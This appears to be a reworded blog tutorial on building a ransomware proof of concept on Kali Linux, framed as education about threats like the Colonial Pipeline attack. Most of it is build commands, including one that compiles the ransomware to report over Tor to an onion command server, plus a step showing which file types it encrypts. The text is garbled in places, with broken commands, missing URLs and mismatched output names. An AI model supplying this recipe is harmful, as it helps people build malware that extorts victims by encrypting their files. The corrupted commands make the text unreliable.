How to Create a Ransomware Using Kali Linux?

Ransomware: Build Your Own Ransomware


Ransomware is quickly becoming the most serious form of malware that affects our digital systems. Many forms of malware are attacking companies around the world, including the new snake, which is specifically designed for SCADA/ICS systems. This ransomware poses a threat to national infrastructure and industrial systems. The ransom was paid for $5 million by the Colonial Pipeline in the US. CNA, a major US insurance company, recently admitted that it had paid $40 million in ransom! Ransomware is becoming more sophisticated and malicious.

Let’s create our own ransomware using a Proof of Concept (POC), available from mauri870 at This ransomware was created by him as part of an academic program. It is not malicious in nature, but it is meant to help us understand ransomware. This malware, like the Snake variant and many other malware strains, is written in Golang.

This malware encrypts files in the background using AES256-CTR and uses RSA-4096 for data exchange with the server. This ransomware looks very similar to Cryptolocker which is one of the most popular ransomware attacks ever.

 Step 1: Download and install the Binaries   

First, fire up Kali and ensure that golang has been installed. You can download it from the Kali repositories, by entering

 kali > sudo apt install golang   

Next, log in to root user.


Next, change directory (cd), to this directory.

   kali> cdgit   

Next, download the binaries from

   kali > git clone   

     Step 2: Export GO Environment variables   

Next, we will need to define environment variables that direct binaries and GO the correct directories.

     Step 3: Determine the source code dependencies   

Once the variables have been exported and set, it is time to create the dependencies. Navigate to ransomware and type make dips.

   kali > cd ransomware   

   kali > make deps   

     Step 4: Create the Source Code using options   

Once we have finished the steps makes, we can start to create the source code. We will be using a few options in our case.

ToR is the first option. This will encrypt all communications sent over the ToR network.


Second, we want to use our dark webserver at hackersarisegtdj. onion (you can use any domain or localhost).


We want to use Port 80 (you can use any port).


Finally, we need to configure the operating system to compile our source code, in this instance Linux.


This should be the command we send.

   kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux   

Hit ENTER to watch your ransomware build.


      Step 5 – Check the Directory for ransomware.  

After the source code is generated, you can do a lengthy listing in the ransomware directory.

 kali> ls   

Navigate to the bin directory.


You will find the ransomware.exe and the server.

     Step 6 – Examine the Types Of Files To Be Encrypted   

Navigate to cmd directory to open common.

   kali > Cd cmd   

   Kali > more frequent. go   

This section shows you the file extensions this ransomware will encrypt when it is executed.


Ransomware is the most serious threat to our digital systems right now. The Colonial Pipeline attack has clearly shown that almost everyone is at risk. If SCADA/ICS systems are compromised, there could be serious economic and infrastructure ramifications.

This POC of Ransomware will allow you to understand ransomware better and help you test your systems to determine if they are susceptible.

This is the second part of this series. We will be testing this ransomware on a Windows VM.